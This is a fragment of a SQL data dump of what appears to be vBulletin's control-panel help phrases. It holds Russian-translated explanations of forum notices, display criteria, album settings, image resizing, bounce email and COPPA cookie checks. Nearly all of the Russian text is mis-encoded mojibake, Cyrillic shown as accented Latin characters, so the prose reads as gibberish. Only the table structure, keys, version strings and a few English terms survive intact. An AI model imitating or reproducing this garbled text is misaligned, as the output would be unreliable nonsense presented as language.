(22830, -1, 'notice_add_edit_html_text', 'cphelptext', 'Ãòî ïîëå äîëæÃî ñîäåðæà òü HTML êîä âà øåé âà æÃîé èÃôîðìà öèè. Âû ìîæåòå èñïîëüçîâà òü ëþáîé HTML êîä - BB êîä çäåñü ÃÃ¥ áóäåò ðà áîòà òü. \r\n \r\nÅñëè âû æåëà åòå óêà çà òü èìÿ ïîëüçîâà òåëÿ, ïðîñìà òðèâà þùåãî âà øó èÃôîðìà öèþ, òî âêëþ÷èòå â òåêñò ïåðåìåÃÃûå {username} èëè {musername}, êîòîðûå áóäóò çà ìåÃÃ¥Ãû Ãà èìÿ ïîëüçîâà òåëÿ, êîãäà ïîëüçîâà òåëè áóäóò åãî ïðîñìà òðèâà òü. ÃåðåìåÃÃà ÿ {musername} îòâå÷à åò çà èìÿ ïîëüçîâà òåëÿ ñ âûäåëåÃèåì, çà âèñÿùèì îò ãðóïïû ïîëüçîâà òåëÿ. \r\n \r\nÅù¸ âû ìîæåòå èñïîëüçîâà òü ïåðåìåÃÃûå {userid} è {sessionurl}, ÷òîáû äîáà âèòü â èÃôîðìà öèþ âÃóòðåÃÃèå ãèïåðññûëêè. \r\n \r\nÇäåñü äîëæåà áûòü ââåä¸à òåêñò Ãà îñÃîâÃîì ÿçûêå âà øåãî ôîðóìà . Åñëè âû æåëà åòå ñîçäà òü ñîîáùåÃèå Ãà äðóãèõ ÿçûêà õ, êîòîðûå âêëþ÷åÃû Ãà âà øåì ôîðóìå, òî Ãà æìèòå Ãà ññûëêó \"Ãåðåâîäû\".', 'vbulletin', 'zCarot', 1225806443, '3.8.0 Beta 2'),
(22831, -1, 'notice_add_edit_html_title', 'cphelptext', 'HTML êîä âà æÃîãî ñîîáùåÃèÿ', 'vbulletin', 'zCarot', 1189782859, '3.6.8'),
(22832, -1, 'notice_add_edit_displayorder_text', 'cphelptext', 'Ãòîò ïà ðà ìåòð îïðåäåëÿåò ïîðÿäîê îòîáðà æåÃèÿ êà ê â óïðà âëåÃèè âà æÃîé èÃôîðìà öèåé, òà ê è ïîðÿäîê, â êîòîðîì îÃè îòîáðà æà þòñÿ ïîëüçîâà òåëÿì.', 'vbulletin', 'zCarot', 1206707268, '3.7.0 Release Candidate 2'),
(22833, -1, 'notice_add_edit_displayorder_title', 'cphelptext', 'Ãîðÿäîê îòîáðà æåÃèÿ', 'vbulletin', 'zCarot', 1189783140, '3.6.8'),
(22834, -1, 'notice_add_edit_active_text', 'cphelptext', 'Ãòî áûñòðûé ïåðåêëþ÷à òåëü, ïîçâîëÿþùèé âà ì îòêëþ÷èòü îòîáðà æåÃèå âà æÃîé èÃôîðìà öèè, ÃÃ¥ óäà ëÿÿ å¸.', 'vbulletin', 'zCarot', 1189783173, '3.6.8'),
(22835, -1, 'notice_add_edit_active_title', 'cphelptext', 'ÀêòèâÃî', 'vbulletin', 'zCarot', 1189783173, '3.6.8'),
(22836, -1, 'notice_add_edit_persistent_text', 'cphelptext', 'Åñëè âà æÃà ÿ èÃôîðìà öèÿ ÃÃ¥ ÿâëÿåòñÿ ïîñòîÿÃÃîé, òî îÃà áóäåò îòîáðà æåÃà ëèøü îäèà ðà ç, êîãäà ïîëüçîâà òåëü çà ø¸ë Ãà ôîðóì, à ïîòîì áóäåò ñêðûòà äî òåõ ïîð, ïîêà ïîëüçîâà òåëü ÃÃ¥ çà éä¸ò Ãà ôîðóì ñÃîâà (îòîáðà æà åòñÿ ðà ç â îäÃîé ñåññèè áðà óçåðà ). \r\n \r\nÅñëè æå âà æÃà ÿ èÃôîðìà öèÿ ÿâëÿåòñÿ ïîñòîÿÃÃîé, òî îÃî áóäåò îòîáðà æà òüñÿ êà æäûé ðà ç, êîãäà âûïîëÃÿþòñÿ óñëîâèÿ åãî îòîáðà æåÃèÿ.', 'vbulletin', 'zCarot', 1190023789, '3.6.8'),
(22837, -1, 'notice_add_edit_persistent_title', 'cphelptext', 'ÃîñòîÿÃÃà ÿ', 'vbulletin', 'zCarot', 1189783229, '3.6.8'),
(22838, -1, 'notice_add_edit_criteria_text', 'cphelptext', 'Çäåñü Ãà õîäèòñÿ ñïèñîê óñëîâèé, êîòîðûå äîëæÃû áûòü âûïîëÃÃ¥Ãû, ÷òîáû îòîáðà æà òü äà ÃÃóþ âà æÃóþ èÃôîðìà öèþ. \r\n \r\n×òîáû à êòèâèðîâà òü ïðîâåðêó Ãà îïðåäåë¸ÃÃûé êðèòåðèé, ïîñòà âüòå îòìåòêó ðÿäîì ñ åãî îïèñà Ãèåì, à çà òåì, åñëè òðåáóåòñÿ, ââåäèòå ñâîè çÃà ÷åÃèÿ äëÿ ÃóæÃîãî êðèòåðèÿ. \r\n \r\n×òîáû âà æÃà ÿ èÃôîðìà öèÿ îòîáðà æà ëà ñü äîëæÃû âûïîëÃÿòüñÿ âñå âûáðà ÃÃûå êðèòåðèè. \r\n \r\nÄëÿ êðèòåðèåâ, â êîòîðûõ óïîìèÃà þòñÿ \"îò X äî Y\", óñëîâèåì âûïîëÃÃ¥Ãèÿ áóäåò Ãà õîæäåÃèå çÃà ÷åÃèå ìåæäó X è Y, âêëþ÷à ÿ X è Y. Ãà ïðèìåð, åñëè âû âûáðà ëè êðèòåðèé \'Ó ïîëüçîâà òåëÿ îò 10 äî 20 î÷êîâ ðåïóòà öèè\', òî ïîëüçîâà òåëü ñ 10 èëè 20 î÷êà ìè ðåïóòà öèè, ëèáî ñ çÃà ÷åÃèåì ìåæäó 10 è 20, áóäåò âèäåòü ýòó âà æÃóþ èÃôîðìà öèþ. \r\n \r\nÂû ìîæåòå èñïîëüçîâà òü òà êèå óñëîâèÿ êà ê \"ìåÃüøå, ÷åì\" èëè \"áîëüøå, ÷åì\". ×òîáû ñäåëà òü \"ìåÃüøå, ÷åì\", îñòà âüòå ïåðâîå çÃà ÷åÃèå ïóñòûì, òîãäà ýòî óñëîâèå áóäåò îçÃà ÷à òü \"ìåÃüøå, ÷åì âòîðîå çÃà ÷åÃèå\". Äëÿ \"áîëüøå, ÷åì\", îñòà âüòå âòîðîå çÃà ÷åÃèå ïóñòûì, òîãäà ýòî óñëîâèå áóäåò îçÃà ÷à òü \"áîëüøå, ÷åì ïåðâîå çÃà ÷åÃèå\". \r\n \r\nÊðèòåðèé \"Êðèòåðèé äëÿ âà æÃîé èÃôîðìà öèè X ÃÃ¥ Ãà éäåÃ\" ÿâëÿåòñÿ îñîáûì ñëó÷à åì. Îà ðà áîòà åò ñëåäóþùèì îáðà çîì: ñÃà ÷à ëà çà ïðà øèâà åòñÿ ñïèñîê âñåé âà æÃîé èÃôîðìà öèè, êîòîðà ÿ ìîæåò áûòü âûâåäåÃà Ãà ôîðóìå, à çà òåì óäà ëÿåòñÿ âà æÃà ÿ èÃôîðìà öèÿ, êîòîðà ÿ çà âèñèò îò äðóãîé âà æÃîé èÃôîðìà öèè, Ãà õîäÿùåéñÿ â ýòîì ñïèñêå. \r\n \r\nÃà ññìîòðèì ïðèìåð:\r\nÑóùåñòâóåò âà æÃà ÿ èÃôîðìà öèÿ À, à è Â. \r\nÂà æÃà ÿ èÃôîðìà öèÿ À îòîáðà æà åòñÿ âñåì ïîëüçîâà òåëÿì, ïðèÃà äëåæà ùèì ãðóïïå \"Çà ðåãèñòðèðîâà ÃÃûå\". \r\nÂà æÃà ÿ èÃôîðìà öèÿ à îòîáðà æà åòñÿ, åñëè êðèòåðèé äëÿ âà æÃîé èÃôîðìà öèè À ÃÃ¥ Ãà éäåÃ. \r\nÂà æÃà ÿ èÃôîðìà öèÿ  îòîáðà æà åòñÿ, åñëè êðèòåðèé äëÿ âà æÃîé èÃôîðìà öèè à ÃÃ¥ Ãà éäåÃ. \r\nÇà ðåãèñòðèðîâà ÃÃûé ïîëüçîâà òü ïðîñìà òðèâà åò ñòðà Ãèöó. Îòîáðà æà åòñÿ âà æÃà ÿ èÃôîðìà öèÿ À. \r\nÂà æÃà ÿ èÃôîðìà öèÿ à ÃÃ¥ îòîáðà æà åòñÿ, òà ê êà ê êðèòåðèé äëÿ îòîáðà æåÃèÿ âà æÃîé èÃôîðìà öèè À Ãà éäåà è óæå îáðà áîòà Ã. \r\nÂà æÃà ÿ èÃôîðìà öèÿ  òà êæå ÃÃ¥ îòîáðà æà åòñÿ, èáî êðèòåðèé äëÿ âà æÃîé èÃôîðìà öèè à Ãà éäåÃ, ïðè÷¸ì ÃÃ¥ âà æÃî êà êîå áûëî ïðèÃÿòî ðåøåÃèå - îòîáðà æà òü èëè ÃÃ¥ îòîáðà æà òü âà æÃóþ èÃôîðìà öèþ Ã. \r\n ðåçóëüòà òå áóäåò îòîáðà æåÃà ëèøü âà æÃà ÿ èÃôîðìà öèÿ À. ÀÃà ëîãè÷Ãûé ðåçóëüòà ò áóäåò ïîëó÷åà ïðè ëþáîì ïîðÿäêå îòîáðà æåÃèÿ âà æÃîé èÃôîðìà öèè. \r\n ', 'vbulletin', 'zCarot', 1209205296, '3.7.0'),
(22839, -1, 'notice_add_edit_criteria_title', 'cphelptext', 'Îòîáðà æà òü ýòó èÃôîðìà öèþ, åñëè...', 'vbulletin', 'zCarot', 1189778146, '3.6.8'),
(22840, -1, 'notice_modify_tableheader_text', 'cphelptext', 'Çäåñü âû óâèäèòå ñïèñîê âñåé âà æÃîé èÃôîðìà öèè, êîòîðà ÿ Ãà äà ÃÃûé ìîìåÃò ñóùåñòâóþò Ãà âà øåì ôîðóìå. \r\n \r\nÃà âåðõó ñïèñêà ìîæÃî ïîñòà âèòü îòìåòêó, êîòîðà ÿ èçìåÃèò ñòà òóñ à êòèâÃîñòè âñåé âà æÃîé èÃôîðìà öèè îäÃîâðåìåÃÃî. \r\n \r\n×òîáû îòðåäà êòèðîâà òü âà æÃóþ èÃôîðìà öèþ, Ãà æìèòå Ãà å¸ Çà ãîëîâêå. ×òîáû óäà ëèòü âà æÃóþ èÃôîðìà öèþ, èñïîëüçóéòå êÃîïêó \"Óäà ëèòü\" â êîÃöå ñîîòâåòñòâóþùåé ñòðîêè. \r\n \r\nÓ êà æäîé âà æÃîé èÃôîðìà öèè åñòü äâå îòìåòêè è ïîëå ñ ÷èñëîì, êîòîðûå îáîçÃà ÷à þò ñîîòâåòñòâåÃÃî: ñòà òóñ à êòèâÃîñòè è ñòà òóñ ïîñòîÿÃñòâà , è ïîðÿäîê îòîáðà æåÃèÿ. \r\n \r\nÅñëè âà æÃà ÿ èÃôîðìà öèÿ ÃÃ¥ à êòèâÃà , òî îÃà ÃÃ¥ îòîáðà æà åòñÿ ïîëüçîâà òåëÿì Ãè ïðè êà êèõ óñëîâèÿõ. \r\n \r\nÂà æÃà ÿ èÃôîðìà öèÿ, ÃÃ¥ ÿâëÿþùà ÿñÿ ïîñòîÿÃÃîé, áóäåò îòîáðà æåÃà ëèøü îäèà ðà ç, êîãäà ïîëüçîâà òåëü çà ø¸ë Ãà ôîðóì, à ïîòîì áóäåò ñêðûòà äî òåõ ïîð, ïîêà ïîëüçîâà òåëü ÃÃ¥ çà éä¸ò Ãà ôîðóì ñÃîâà (îòîáðà æà åòñÿ ðà ç â îäÃîé ñåññèè áðà óçåðà ). \r\n \r\nÃîðÿäîê îòîáðà æåÃèÿ âëèÿåò êà ê Ãà îòîáðà æåÃèå â óïðà âëåÃèè âà æÃîé èÃôîðìà öèåé, òà ê è Ãà îòîáðà æåÃèå ïîëüçîâà òåëÿì. Ãòî ìîæåò èñïîëüçîâà òüñÿ è ïðè ñîñòà âëåÃèè óñëîâèÿ \'Âà æÃà ÿ èÃôîðìà öèÿ <ÕÕÕ> åù¸ ÃÃ¥ áûëà îòîáðà æåÃà Ãà ýòîé ñòðà Ãèöå\'. \r\n \r\nÃîñëå èçìåÃÃ¥Ãèÿ ñòà òóñîâ à êòèâÃîñòè èëè ïîñòîÿÃñòâà , èëè ïðè èçìåÃÃ¥Ãèè ïîðÿäêà îòîáðà æåÃèÿ, âà ì ÃóæÃî Ãà æà òü Ãà êÃîïêó \"Ñîõðà Ãèòü\", ÷òîáû çà ïèñà òü âÃåñ¸ÃÃûå âà ìè èçìåÃÃ¥Ãèÿ.', 'vbulletin', 'zCarot', 1190023553, '3.6.8'),
(22841, -1, 'notice_modify_tableheader_title', 'cphelptext', 'Óïðà âëåÃèå âà æÃîé èÃôîðìà öèåé', 'vbulletin', 'zCarot', 1189783807, '3.6.8'),
(22842, -1, 'options_text', 'cphelptext', 'ÎñÃîâÃûå Ãà ñòðîéêè: \r\nÃòîò ðà çäåë Ãà Ãåëè ÀäìèÃèñòðà òîðà ñîäåðæèò âñå Ãà ñòðà èâà åìûå îñÃîâÃûå Ãà ñòðîéêè ôîðóìà . Îïöèè ðà çäåëåÃû Ãà ãðóïïû, Ãà çâà Ãèÿ êîòîðûõ óêà çûâà þò Ãà òèï îïöèé, ñîäåðæà ùèõñÿ â Ãèõ. \r\n\r\nÃðè êîÃôèãóðèðîâà Ãèè ýòèõ îïöèé ó âà ñ åñòü âîçìîæÃîñòü îòîáðà çèòü âñå îïöèè (èõ äîâîëüÃî ìÃîãî) èç âñåõ ãðóïï, èëè îòîáðà æà òü ëèøü îïöèè èç îäÃîé ãðóïïû çà ðà ç. Åñëè âû ïðîéä¸òåñü ïîñëå Ãîâîé óñòà Ãîâêè èëè îáÃîâëåÃèÿ ñ âåðñèè 2, òî âû ìîæåòå çà ìåòèòü, ÷òî âñå îïöèè îòîáðà æà þòñÿ äîâîëüÃî óäîáÃî, è âû ìîæåòå ñîõðà Ãèòü âñ¸ ðà çîì.  ïðîòèâÃîì ñëó÷à å, âû ìîæåòå ïðîñòî îòêðûòü ãðóïïó, ñîäåðæà ùóþ îïöèè, êîòîðûå âû æåëà åòå ñêîÃôèãóðèðîâà òü. \r\n\r\nÅñëè âû èùåòå îïðåäåëåÃÃóþ îïöèþ, Ãî ÃÃ¥ çÃà åòå â êà êîé îÃà ãðóïïå, òî âû ìîæåòå îòîáðà çèòü âñå îïöèè è ñäåëà òü ïîèñê Ãà ñòðà Ãèöå ñ ïîìîùüþ âà øåãî îáîçðåâà òåëÿ.  Internet Explorer, Moziila, Opera ïîëüçîâà òåëè ìîãóò Ãà æà òü Ctrl - F äëÿ ïîèñêà ïî ñòðà Ãèöå.  äðóãèõ îáîçðåâà òåëÿõ ìîæåò áûòü ïî-äðóãîìó.', 'vbulletin', '', 0, ''),
(22843, -1, 'options_title', 'cphelptext', 'Îá îñÃîâÃûõ Ãà ñòðîéêà õ', 'vbulletin', '', 0, ''),
(22844, -1, 'options_options_text', 'cphelptext', 'Ãà ýòîé ñòðà Ãèöå âû ìîæåòå âûáðà òü ãðóïïó îïöèé, êîòîðóþ æåëà åòå èçìåÃèòü. Âû ìîæåòå òà êæå îòîáðà çèòü âñå îïöèè Ãà îäÃîé ñòðà Ãèöå, Ãà æà â Ãà \"Îòîáðà çèòü âñå Ãà ñòðîéêè\".  Internet Explorer èñïîëüçóåòñÿ äâîéÃîå Ãà æà òèå äëÿ ïåðåõîäà Ãà ñîîòâåòñòâóþùóþ ñòðà Ãèöó à âòîìà òè÷åñêè.', 'vbulletin', '', 0, ''),
(22845, -1, 'options_options_title', 'cphelptext', 'ÈçìåÃÃ¥Ãèå îïöèé ôîðóìà ', 'vbulletin', '', 0, ''),
(22846, -1, 'options_options_albums_perpage_text', 'cphelptext', 'Îïðåäåëÿåò ìà êñèìà ëüÃîå êîëè÷åñòâî à ëüáîìîâ, îòîáðà æà åìûõ Ãà îäÃîé ñòðà Ãèöå, ïðè ïðîñìîòðå ñïèñêå à ëüáîìîâ. \r\n \r\nÃîìÃèòå: Ãòî ÷èñëî äîëæÃî áûòü áîëüøå Ãóëÿ.', 'vbulletin', 'zCarot', 1208955489, '3.7.0 Release Candidate 4'),
(22847, -1, 'options_options_albums_perpage_title', 'cphelptext', 'Àëüáîìîâ Ãà ñòðà Ãèöó', 'vbulletin', 'zCarot', 1193063555, '3.7.0 Beta 1'),
(22848, -1, 'options_options_albums_pictures_moderation_text', 'cphelptext', 'Åñëè \"Äà \", òî âñå èçîáðà æåÃèÿ, çà ãðóæà åìûå ïîëüçîâà òåëÿìè â à ëüáîìû, áóäóò îòïðà âëÿòüñÿ Ãà ïðîâåðêó ìîäåðà òîðà ì. \r\n \r\n Ãåêîòîðûõ ñëó÷à åâ ýòîãî òðåáóåò çà êîÃîäà òåëüñòâî, Ãà ïðèìåð, äëÿ ôîðóìîâ, ðà çìåù¸ÃÃûõ â Ãåðìà Ãèè. \r\n \r\nÅñëè âû æåëà åòå îòïðà âëÿòü Ãà ïðîâåðêó èçîáðà æåÃèÿ, çà ãðóæåÃÃûå ïîëüçîâà òåëÿìè îïðåäåë¸ÃÃûõ ãðóïï, òî âû ìîæåòå óñòà Ãîâèòü ýòî â óïðà âëåÃèè ãðóïïà ìè ïîëüçîâà òåëåé.', 'vbulletin', 'zCarot', 1205419650, '3.7.0 Release Candidate 1'),
(22849, -1, 'options_options_albums_pictures_moderation_title', 'cphelptext', 'Ãðîâåðêà èçîáðà æåÃèé', 'vbulletin', 'zCarot', 1205419650, '3.7.0 Release Candidate 1'),
(22850, -1, 'options_options_album_captionpreviewlen_text', 'cphelptext', 'Îïðåäåëÿåò êîëè÷åñòâî ñèìâîëîâ èç îïèñà Ãèÿ èçîáðà æåÃèÿ, êîòîðûå áóäóò îòîáðà æåÃû ïðè Ãà âåäåÃèè êóðñîðà Ãà èçîáðà æåÃèå â à ëüáîìå.', 'vbulletin', 'zCarot', 1193064182, '3.7.0 Beta 1'),
(22851, -1, 'options_options_album_captionpreviewlen_title', 'cphelptext', 'ÄëèÃà ïðåäïðîñìîòðà îïèñà Ãèÿ', 'vbulletin', 'zCarot', 1193064182, '3.7.0 Beta 1'),
(22852, -1, 'options_options_album_maxpicsperalbum_text', 'cphelptext', 'Ãòîò ïà ðà ìåòð îïðåäåëÿåò ãëîáà ëüÃûé ïðåäåë äëÿ êîëè÷åñòâà èçîáðà æåÃèé, êîòîðûå ïîëüçîâà òåëü ñìîæåò ðà çìåñòèòü â îäÃîì à ëüáîìå, ïðè ýòîì êîëè÷åñòâî à ëüáîìîâ ÃÃ¥ îãðà Ãè÷åÃî. \r\n \r\nÂû ìîæåòå îãðà Ãè÷èòü îáùåå êîëè÷åñòâî èçîáðà æåÃèé, êîòîðîå ìîæåò çà ãðóçèòü ïîëüçîâà òåëü, ÷åðåç ïðà âà ãðóïïû ïîëüçîâà òåëåé.', 'vbulletin', 'zCarot', 1193064329, '3.7.0 Beta 1'),
(22853, -1, 'options_options_album_maxpicsperalbum_title', 'cphelptext', 'Ìà êñèìà ëüÃîå êîëè÷åñòâî èçîáðà æåÃèé â à ëüáîìå', 'vbulletin', 'zCarot', 1193064329, '3.7.0 Beta 1'),
(22854, -1, 'options_options_album_pictures_perpage_text', 'cphelptext', 'Îïðåäåëÿåò ìà êñèìà ëüÃîå êîëè÷åñòâî èçîáðà æåÃèé, îòîáðà æà åìûõ ïðè ïðîñìîòðå à ëüáîìà Ãà îäÃîé ñòðà Ãèöå. \r\n \r\nÃîìÃèòå: Ãòî ÷èñëî äîëæÃî áûòü áîëüøå Ãóëÿ.', 'vbulletin', 'zCarot', 1208955526, '3.7.0 Release Candidate 4'),
(22855, -1, 'options_options_album_pictures_perpage_title', 'cphelptext', 'Èçîáðà æåÃèé Ãà ñòðà Ãèöó', 'vbulletin', 'zCarot', 1193063576, '3.7.0 Beta 1'),
(22856, -1, 'options_options_album_recentalbumdays_text', 'cphelptext', 'Âû ìîæåòå óêà çà òü êîëè÷åñòâî äÃåé, â òå÷åÃèå êîòîðûõ à ëüáîìû áóäóò Ãà õîäèòüñÿ â ñïèñêå Ãåäà âÃî îáÃîâë¸ÃÃûõ. ÂîçìîæÃî, âû ïîæåëà åòå óâåëè÷èòü ýòî çÃà ÷åÃèå, åñëè èçîáðà æåÃèÿ îáÃîâëÿþòñÿ ÃÃ¥ ñëèøêîì ÷à ñòî, ëèáî Ãà îáîðîò. Åñëè ïðà âà ïîëüçîâà òåëåé Ãà äîñòóï ê à ëüáîìà ì áóäóò èçìåÃÃ¥Ãû, òî ýëåìåÃòû ñïèñêà ìîãóò áûòü ÃåäîñòóïÃû. Ãòî ìîæåò áûòü èñïðà âëåÃî ñ ïîìîùüþ îáÃîâëåÃèÿ ñ÷¸ò÷èêîâ. ', 'vbulletin', 'zCarot', 1217326340, '3.8.0 Alpha 1'),
(22857, -1, 'options_options_album_recentalbumdays_title', 'cphelptext', 'ÄÃåé äëÿ ïîìåòêè à ëüáîìà êà ê Ãåäà âÃî îáÃîâë¸ÃÃîãî', 'vbulletin', 'zCarot', 1217326253, '3.8.0 Alpha 1'),
(22858, -1, 'options_options_album_thumbsize_text', 'cphelptext', 'Ìà êñèìà ëüÃà ÿ âûñîòà è øèðèÃà ìèÃèà òþð èçîáðà æåÃèé, çà ãðóæåÃÃûõ ÷åðåç ñèñòåìó à ëüáîìîâ. Ãðîïîðöèè èçîáðà æåÃèé áóäóò ñîáëþäà òüñÿ. \r\n \r\nÃà ïðèìåð, åñëè ïîëüçîâà òåëü çà ãðóæà åò èçîáðà æåÃèå ñ ðà çìåðà ìè 900x600 ïèêñåëåé, à ðà çìåð ìèÃèà òþð â à ëüáîìà õ = 150, òî ìèÃèà òþðà áóäåò èìåòü ðà çìåðû 150x100 ïèêñåëåé.', 'vbulletin', 'zCarot', 1193063995, '3.7.0 Beta 1'),
(22859, -1, 'options_options_album_thumbsize_title', 'cphelptext', 'Ãà çìåð ìèÃèà òþð â à ëüáîìà õ', 'vbulletin', 'zCarot', 1193063995, '3.7.0 Beta 1'),
(22860, -1, 'options_options_album_uploadamount_text', 'cphelptext', 'Îïðåäåëÿåò êîëè÷åñòâî èçîáðà æåÃèé, êîòîðûå ìîãóò áûòü îäÃîâðåìåÃÃî çà ãðóæåÃû Ãà ôîðóì. Êà êîå áû çäåñü Ãè áûëî óêà çà Ãî ÷èñëî, ïîëüçîâà òåëü ÃÃ¥ ñìîæåò îáîéòè îãðà Ãè÷åÃèÿ, óñòà ÃîâëåÃÃûå äëÿ ýòîãî à ëüáîìà è/èëè ãðóïïû ïîëüçîâà òåëåé. \r\n \r\nÎäÃà êî, åñëè âû óêà æèòå çäåñü î÷åÃü áîëüøîå çÃà ÷åÃèå, òî ýòî ìîæåò ïðèâåñòè ê âûñîêîé Ãà ãðóçêå Ãà ñåðâåð, åñëè èçîáðà æåÃèÿ Ãà äî áóäåò ñæèìà òü äî îïðåäåë¸ÃÃûõ ðà çìåðîâ. \r\n \r\nÇÃà ÷åÃèå äà ÃÃîãî ïà ðà ìåòðà ÃÃ¥ ìîæåò áûòü Ãèæå 1.', 'vbulletin', 'zCarot', 1193064221, '3.7.0 Beta 1'),
(22861, -1, 'options_options_album_uploadamount_title', 'cphelptext', 'Êîëè÷åñòâî èçîáðà æåÃèé, êîòîðûå ìîãóò áûòü çà ãðóæåÃû îäÃîâðåìåÃÃî', 'vbulletin', 'zCarot', 1193064221, '3.7.0 Beta 1'),
(22862, -1, 'options_options_attachresize_text', 'cphelptext', 'Åñëè ýòà îïöèÿ âêëþ÷åÃà , òî ôîðóì áóäåò ïûòà òüñÿ à âòîìà òè÷åñêè ñæèìà òü èçîáðà æåÃèÿ, êîòîðûå ïðåâûøà þò óñòà ÃîâëåÃÃûå çÃà ÷åÃèÿ äëÿ êîÃêðåòÃîãî òèïà . Èçîáðà æåÃèå áóäåò ïðîïîðöèîÃà ëüÃî ñæà òî ïî äëèÃÃ¥ è øèðèÃÃ¥, ÷òîáû åãî ïà ðà ìåòðû ÃÃ¥ ïðåâîñõîäèëè ïðåäåëû, óñòà ÃîâëåÃÃûå äëÿ äà ÃÃîãî òèïà èçîáðà æåÃèÿ. Ñæà òîå èçîáðà æåÃèå áóäåò êîÃâåðòèðîâà Ãî â JPG äëÿ óìåÃüøåÃèÿ ðà çìåðà ôà éëà èçîáðà æåÃèÿ. Òèïû èçîáðà æåÃèé, êîòîðûå ìîãóò áûòü ñæà òû, çà âèñÿò îò êîÃôèãóðà öèè âà øåãî ñåðâåðà . Âîò ïðèìåðÃûå âà ðèà Ãòû:\r\n \r\nGD \r\nJPEG => JPEG \r\nPNG => JPEG \r\nGIF => JPEG\r\n \r\n \r\nImagemagick \r\nJPEG => JPEG \r\nPNG => JPEG \r\nGIF => JPEG \r\nBMP => JPEG \r\nTIFF => JPEG \r\nPSD (Ãåò)* \r\nPDF (Ãåò)* \r\n*Èçîáðà æåÃèÿ ôîðìà òà PSD è PDF ÃÃ¥ ìîãóò áûòü ñæà òû, òà ê êà ê ýòî ïðîèçâåä¸ò ïîòåðþ âñåõ îñîáûõ âîçìîæÃîñòåé äà ÃÃîãî òèïà èçîáðà æåÃèé. ', 'vbulletin', 'zCarot', 1177625993, '3.6.6'),
(22863, -1, 'options_options_attachresize_title', 'cphelptext', 'Ñæèìà òü èçîáðà æåÃèÿ', 'vbulletin', 'zCarot', 1145475753, '3.6.0 Beta 1'),
(22864, -1, 'options_options_bounceemail_text', 'cphelptext', 'Åñëè ýëåêòðîÃÃîå ïèñüìî, îòïðà âëåÃÃîå ôîðóìîì, áóäåò îòïðà âëåÃî Ãà çà ä (bounced) ñåðâåðîì ïî êà êîé-ëèáî ïðè÷èÃÃ¥, òî ïî èÃòåðÃåò ñòà Ãäà ðòà ì äîëæåà áûòü óêà çà à êîððåêòÃûé à äðåñ ýëåêòðîÃÃîé ïî÷òû, ïî êîòîðîìó áóäóò îòïðà âëåÃû ýòè ñîîáùåÃèÿ. Ãòà îïöèÿ äà ¸ò âîçìîæÃîñòü óêà çà òü òà êîé à äðåñ. \r\n \r\nÅñëè ýòî ïîëå ÃÃ¥ çà ïîëÃÿòü, òî áóäåò èñïîëüçîâà à à äðåñ ýëåêòðîÃÃîé ïî÷òû à äìèÃèñòðà òîðà . \r\n \r\nÃòîò à äðåñ áóäåò èñïîëüçîâà òüñÿ â êà ÷åñòâå à äðåñà îòïðà âèòåëÿ ïðè èñïîëüçîâà Ãèè SMTP ñåðâåðà , à òà êæå ïðè âêëþ÷åÃÃîé îïöèè \"Óñòà Ãîâèòü ïà ðà ìåòð -f\" äëÿ sendmail.', 'vbulletin', 'zCarot', 1205419400, '3.7.0 Release Candidate 1'),
(22865, -1, 'options_options_bounceemail_title', 'cphelptext', 'ÃëåêòðîÃÃà ÿ ïî÷òà äëÿ âîçâðà òà ïèñüìà ', 'vbulletin', 'zCarot', 1205419400, '3.7.0 Release Candidate 1'),
(22866, -1, 'options_options_checkcoppa_text', 'cphelptext', 'Ãðè âêëþ÷åÃèè ýòîé îïöèè áóäåò ïðîèñõîäèòü ñîõðà ÃÃ¥Ãèå cookie Ãà êîìïüþòåðå ïîëüçîâà òåëÿ, åñëè îà ââ¸ë âîçðà ñò ìåÃåå 13 ëåò. Ãîñëåäóþùèå ïîïûòêè ðåãèñòðà öèè ñ ëþáûì äðóãèì âîçðà ñòîì áóäóò òà êæå îòêëîÃÃ¥Ãû. Ó÷òèòå, ÷òî ïîëüçîâà òåëè âñ¸ ðà âÃî ñìîãóò îáîéòè ýòó çà ùèòó, óäà ëèâ cookie ñà ìîñòîÿòåëüÃî.', 'vbulletin', 'zCarot', 1144879595, '3.6.0 Beta 1'),
(22867, -1, 'options_options_checkcoppa_title', 'cphelptext', 'Ãðîâåðêà ÷åðåç cookie äëÿ ñèñòåìû ðåãèñòðà öèè COPPA', 'vbulletin', 'zCarot', 1205941754, '3.7.0 Release Candidate 1'),
(22868, -1, 'options_options_errorlogemail_text', 'cphelptext', 'Ââåäèòå ñþäà ïóòü ê ôà éëó. Ãà ïðèìåð, äëÿ Windows ñåðâåðà ïóòü äîëæåà áûòü ïðèìåðÃî òà êèì: \r\n \r\nC:\\logs\\vbulletin.log \r\n \r\nÃà *nix ñåðâåðå ïóòü äîëæåà áûòü ïðèìåðÃî òà êèì: \r\n \r\n/home/yoursite/logs/vbulletin.log \r\n \r\nÃòà îïöèÿ äîëæÃà áûòü âêëþ÷åÃà òîëüêî äëÿ âûÿâëåÃèÿ îøèáîê ïðè îòïðà âêå ïèñåì. Ãðè âêëþ÷åÃèè ýòîé îïöèè ðåçêî âîçðà ñòà åò Ãà ãðóçêà Ãà ñåðâåð.', 'vbulletin', 'zCarot', 1146250311, '3.6.0 Beta 1'),
(22869, -1, 'options_options_errorlogemail_title', 'cphelptext', 'Çà ïèñü âñåõ ýëåêòðîÃÃûõ ïèñåì â ôà éë', 'vbulletin', 'zCarot', 1146250311, '3.6.0 Beta 1'),
(22870, -1, 'options_options_externalcache_text', 'cphelptext', 'Ãî óìîë÷à Ãèþ, ñîäåðæèìîå, ãåÃåðèðóåìîå ñ ïîìîùüþ external.php, êýøèðóåòñÿ Ãà ÷à ñ. Ãòî ïîçâîëÿåò ðåøèòü ïðîáëåìó ñ âðà æäåáÃî Ãà ñòðîåÃÃûìè ïîëüçîâà òåëÿìè, êîòîðûå ÷à ñòî çà ïðà øèâà þò îáÃîâëåÃèÿ èÃôîðìà öèè ñ external.php. Ó÷òèòå, ÷òî Ãåêîòîðûå RSS ïðèëîæåÃèÿ ÃåêîððåêòÃî ðà áîòà þò ïðè ÷à ñîâîì êýøèðîâà Ãèè, óñòà ÃîâëåÃÃîì ôîðóìîì.', 'vbulletin', 'zCarot', 1142519066, '3.6.0 Beta 1'),
(22871, -1, 'options_options_externalcache_title', 'cphelptext', 'ÃðîäîëæèòåëüÃîñòü êýøèðîâà Ãèÿ', 'vbulletin', 'zCarot', 1142519066, '3.6.0 Beta 1'),
